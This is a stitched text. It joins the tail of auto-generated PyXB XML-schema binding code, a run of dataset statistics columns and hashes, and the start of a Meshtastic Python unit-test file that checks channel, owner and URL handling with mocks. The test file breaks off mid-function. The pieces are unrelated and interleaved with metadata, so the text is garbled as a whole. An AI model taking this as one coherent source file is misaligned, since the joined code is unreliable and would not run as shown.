st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, True) ]))
st_5._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
ResourceNotDestroyedFaultType._Automaton = _BuildAutomaton_8()
| 62.741788
| 418
| 0.76331
| 8,840
| 68,765
| 5.74457
| 0.042081
| 0.032708
| 0.053523
| 0.057186
| 0.849533
| 0.844689
| 0.840908
| 0.83758
| 0.815742
| 0.813103
| 0
| 0.027267
| 0.108282
| 68,765
| 1,095
| 419
| 62.799087
| 0.800894
| 0.107409
| 0
| 0.716604
| 1
| 0.149813
| 0.201422
| 0.175831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013733
| false
| 0
| 0.028714
| 0
| 0.198502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a1c8fa22f687c9178afabe4340b84a3c6ea4d64
| 51,518
|
py
|
Python
|
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | null | null | null |
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | null | null | null |
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | 1
|
2022-01-24T17:07:30.000Z
|
2022-01-24T17:07:30.000Z
|
"""Meshtastic unit tests for node.py"""
import re
import logging
from unittest.mock import patch, MagicMock
import pytest
from ..node import Node
from ..serial_interface import SerialInterface
from ..admin_pb2 import AdminMessage
from ..channel_pb2 import Channel
from ..radioconfig_pb2 import RadioConfig
#from ..cannedmessages_pb2 import (CannedMessagePluginMessagePart1, CannedMessagePluginMessagePart2,
# CannedMessagePluginMessagePart3, CannedMessagePluginMessagePart4,
# CannedMessagePluginMessagePart5)
from ..util import Timeout
@pytest.mark.unit
def test_node(capsys):
"""Test that we can instantiate a Node"""
anode = Node('foo', 'bar')
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
anode.showChannels()
anode.showInfo()
out, err = capsys.readouterr()
assert re.search(r'Preferences', out)
assert re.search(r'Channels', out)
assert re.search(r'Primary channel URL', out)
assert err == ''
@pytest.mark.unit
def test_node_requestConfig(capsys):
"""Test run requestConfig"""
iface = MagicMock(autospec=SerialInterface)
amesg = MagicMock(autospec=AdminMessage)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
anode = Node(mo, 'bar')
anode.requestConfig()
out, err = capsys.readouterr()
assert re.search(r'Requesting preferences from remote node', out, re.MULTILINE)
assert err == ''
#@pytest.mark.unit
#def test_node_get_canned_message_with_all_parts(capsys):
# """Test run get_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# # we have a sleep in this method, so override it so it goes fast
# with patch('time.sleep'):
# anode = Node(mo, 'bar')
# anode.cannedPluginMessagePart1 = 'a'
# anode.cannedPluginMessagePart2 = 'b'
# anode.cannedPluginMessagePart3 = 'c'
# anode.cannedPluginMessagePart4 = 'd'
# anode.cannedPluginMessagePart5 = 'e'
# anode.get_canned_message()
# out, err = capsys.readouterr()
# assert re.search(r'canned_plugin_message:abcde', out, re.MULTILINE)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_node_get_canned_message_with_some_parts(capsys):
# """Test run get_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# # we have a sleep in this method, so override it so it goes fast
# with patch('time.sleep'):
# anode = Node(mo, 'bar')
# anode.cannedPluginMessagePart1 = 'a'
# anode.get_canned_message()
# out, err = capsys.readouterr()
# assert re.search(r'canned_plugin_message:a', out, re.MULTILINE)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_one_part(caplog):
# """Test run set_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# anode.set_canned_message('foo')
# assert re.search(r"Setting canned message 'foo' part 1", caplog.text, re.MULTILINE)
# assert not re.search(r"Setting canned message '' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_200(caplog):
# """Test run set_canned_message() 200 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# message_200_chars_long = 'a' * 200
# anode.set_canned_message(message_200_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert not re.search(r"Setting canned message '' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_201(caplog):
# """Test run set_canned_message() 201 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# message_201_chars_long = 'a' * 201
# anode.set_canned_message(message_201_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert re.search(r"Setting canned message 'a' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_1000(caplog):
# """Test run set_canned_message() 1000 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# message_1000_chars_long = 'a' * 1000
# anode.set_canned_message(message_1000_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert re.search(r" part 2", caplog.text, re.MULTILINE)
# assert re.search(r" part 3", caplog.text, re.MULTILINE)
# assert re.search(r" part 4", caplog.text, re.MULTILINE)
# assert re.search(r" part 5", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_1001(capsys):
# """Test run set_canned_message() 1001 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# with pytest.raises(SystemExit) as pytest_wrapped_e:
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar')
# message_1001_chars_long = 'a' * 1001
# anode.set_canned_message(message_1001_chars_long)
# assert pytest_wrapped_e.type == SystemExit
# assert pytest_wrapped_e.value.code == 1
# out, err = capsys.readouterr()
# assert re.search(r'Warning: The canned message', out, re.MULTILINE)
# assert err == ''
@pytest.mark.unit
def test_setOwner_and_team(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name ='Test123', short_name='123', team=1)
assert re.search(r'p.set_owner.long_name:Test123:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.short_name:123:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.is_licensed:False', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.team:1', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwnerShort(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name=None, short_name='123')
assert re.search(r'p.set_owner.short_name:123:', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name ='Test123')
assert re.search(r'p.set_owner.long_name:Test123:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.short_name:Tst:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.is_licensed:False', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.team:0', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name_and_long_name_is_short(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name ='Tnt')
assert re.search(r'p.set_owner.long_name:Tnt:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.short_name:Tnt:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.is_licensed:False', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.team:0', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name_and_long_name_has_words(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name ='A B C', is_licensed=True)
assert re.search(r'p.set_owner.long_name:A B C:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.short_name:ABC:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.is_licensed:True', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.team:0', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_long_name_no_short(caplog):
"""Test setOwner"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.setOwner(long_name ='Aabo', is_licensed=True)
assert re.search(r'p.set_owner.long_name:Aabo:', caplog.text, re.MULTILINE)
assert re.search(r'p.set_owner.short_name:Aab:', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_exitSimulator(caplog):
"""Test exitSimulator"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.exitSimulator()
assert re.search(r'in exitSimulator', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_reboot(caplog):
"""Test reboot"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.reboot()
assert re.search(r'Telling node to reboot', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_shutdown(caplog):
"""Test shutdown"""
anode = Node('foo', 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode.shutdown()
assert re.search(r'Telling node to shutdown', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setURL_empty_url(capsys):
"""Test reboot"""
anode = Node('foo', 'bar', noProto=True)
with pytest.raises(SystemExit) as pytest_wrapped_e:
anode.setURL('')
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 1
out, err = capsys.readouterr()
assert re.search(r'Warning: No RadioConfig has been read', out, re.MULTILINE)
assert err == ''
@pytest.mark.unit
def test_setURL_valid_URL(caplog):
"""Test setURL"""
iface = MagicMock(autospec=SerialInterface)
url = "https://www.meshtastic.org/d/#CgUYAyIBAQ"
with caplog.at_level(logging.DEBUG):
anode = Node(iface, 'bar', noProto=True)
anode.radioConfig = 'baz'
channels = ['zoo']
anode.channels = channels
anode.setURL(url)
assert re.search(r'Channel i:0', caplog.text, re.MULTILINE)
assert re.search(r'modem_config: MidSlow', caplog.text, re.MULTILINE)
assert re.search(r'psk: "\\001"', caplog.text, re.MULTILINE)
assert re.search(r'role: PRIMARY', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setURL_valid_URL_but_no_settings(capsys):
"""Test setURL"""
iface = MagicMock(autospec=SerialInterface)
url = "https://www.meshtastic.org/d/#"
with pytest.raises(SystemExit) as pytest_wrapped_e:
anode = Node(iface, 'bar', noProto=True)
anode.radioConfig = 'baz'
anode.setURL(url)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 1
out, err = capsys.readouterr()
assert re.search(r'Warning: There were no settings', out, re.MULTILINE)
assert err == ''
@pytest.mark.unit
def test_showChannels(capsys):
"""Test showChannels"""
anode = Node('foo', 'bar')
# primary channel
# role: 0=Disabled, 1=Primary, 2=Secondary
# modem_config: 0-5
# role: 0=Disabled, 1=Primary, 2=Secondary
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'testing'
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
anode.showChannels()
out, err = capsys.readouterr()
assert re.search(r'Channels:', out, re.MULTILINE)
# primary channel
assert re.search(r'Primary channel URL', out, re.MULTILINE)
assert re.search(r'PRIMARY psk=default ', out, re.MULTILINE)
assert re.search(r'"modemConfig": "MidSlow"', out, re.MULTILINE)
assert re.search(r'"psk": "AQ=="', out, re.MULTILINE)
# secondary channel
assert re.search(r'SECONDARY psk=secret ', out, re.MULTILINE)
assert re.search(r'"psk": "ipR5DsbJHjWREkCmMKi0M4cA8ksO539Bes31sJAwqDQ="', out, re.MULTILINE)
assert err == ''
@pytest.mark.unit
def test_getChannelByChannelIndex():
"""Test getChannelByChannelIndex()"""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1) # primary channel
channel2 = Channel(index=2, role=2) # secondary channel
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
# test primary
assert anode.getChannelByChannelIndex(0) is not None
# test secondary
assert anode.getChannelByChannelIndex(1) is not None
# test disabled
assert anode.getChannelByChannelIndex(2) is not None
# test invalid values
assert anode.getChannelByChannelIndex(-1) is None
assert anode.getChannelByChannelIndex(9) is None
@pytest.mark.unit
def test_deleteChannel_try_to_delete_primary_channel(capsys):
"""Try to delete primary channel."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
# no secondary channels
channel2 = Channel(index=2, role=0)
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
with pytest.raises(SystemExit) as pytest_wrapped_e:
anode.deleteChannel(0)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 1
out, err = capsys.readouterr()
assert re.search(r'Warning: Only SECONDARY channels can be deleted', out, re.MULTILINE)
assert err == ''
@pytest.mark.unit
def test_deleteChannel_secondary():
"""Try to delete a secondary channel."""
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'testing'
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
anode.channels = channels
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == 'testing'
assert channels[2].settings.name == ''
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
anode.deleteChannel(1)
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == ''
assert channels[2].settings.name == ''
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
@pytest.mark.unit
def test_deleteChannel_secondary_with_admin_channel_after_testing():
"""Try to delete a secondary channel where there is an admin channel."""
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'testing'
channel3 = Channel(index=3, role=2)
channel3.settings.name = 'admin'
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
assert mo.localNode == anode
anode.channels = channels
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == 'testing'
assert channels[2].settings.name == 'admin'
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
anode.deleteChannel(1)
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == 'admin'
assert channels[2].settings.name == ''
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
@pytest.mark.unit
def test_deleteChannel_secondary_with_admin_channel_before_testing():
"""Try to delete a secondary channel where there is an admin channel."""
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'admin'
channel3 = Channel(index=3, role=2)
channel3.settings.name = 'testing'
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
anode.channels = channels
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == 'admin'
assert channels[2].settings.name == 'testing'
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
anode.deleteChannel(2)
assert len(anode.channels) == 8
assert channels[0].settings.modem_config == 3
assert channels[1].settings.name == 'admin'
assert channels[2].settings.name == ''
assert channels[3].settings.name == ''
assert channels[4].settings.name == ''
assert channels[5].settings.name == ''
assert channels[6].settings.name == ''
assert channels[7].settings.name == ''
@pytest.mark.unit
def test_getChannelByName():
"""Get a channel by the name."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'admin'
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
ch = anode.getChannelByName('admin')
assert ch.index == 2
@pytest.mark.unit
def test_getChannelByName_invalid_name():
"""Get a channel by the name but one that is not present."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'admin'
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
ch = anode.getChannelByName('testing')
assert ch is None
@pytest.mark.unit
def test_getDisabledChannel():
"""Get the first disabled channel."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'testingA'
channel3 = Channel(index=3, role=2)
channel3.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel3.settings.name = 'testingB'
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
ch = anode.getDisabledChannel()
assert ch.index == 4
@pytest.mark.unit
def test_getDisabledChannel_where_all_channels_are_used():
"""Get the first disabled channel."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel3 = Channel(index=3, role=2)
channel4 = Channel(index=4, role=2)
channel5 = Channel(index=5, role=2)
channel6 = Channel(index=6, role=2)
channel7 = Channel(index=7, role=2)
channel8 = Channel(index=8, role=2)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
ch = anode.getDisabledChannel()
assert ch is None
@pytest.mark.unit
def test_getAdminChannelIndex():
"""Get the 'admin' channel index."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=2)
channel2.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
channel2.settings.name = 'admin'
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
i = anode._getAdminChannelIndex()
assert i == 2
@pytest.mark.unit
def test_getAdminChannelIndex_when_no_admin_named_channel():
"""Get the 'admin' channel when there is not one."""
anode = Node('foo', 'bar')
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
channel2 = Channel(index=2, role=0)
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
i = anode._getAdminChannelIndex()
assert i == 0
# TODO: should we check if we need to turn it off?
@pytest.mark.unit
def test_turnOffEncryptionOnPrimaryChannel(capsys):
"""Turn off encryption when there is a psk."""
anode = Node('foo', 'bar', noProto=True)
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
# value from using "--ch-set psk 0x1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b "
channel1.settings.psk = b'\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++'
channel2 = Channel(index=2, role=0)
channel3 = Channel(index=3, role=0)
channel4 = Channel(index=4, role=0)
channel5 = Channel(index=5, role=0)
channel6 = Channel(index=6, role=0)
channel7 = Channel(index=7, role=0)
channel8 = Channel(index=8, role=0)
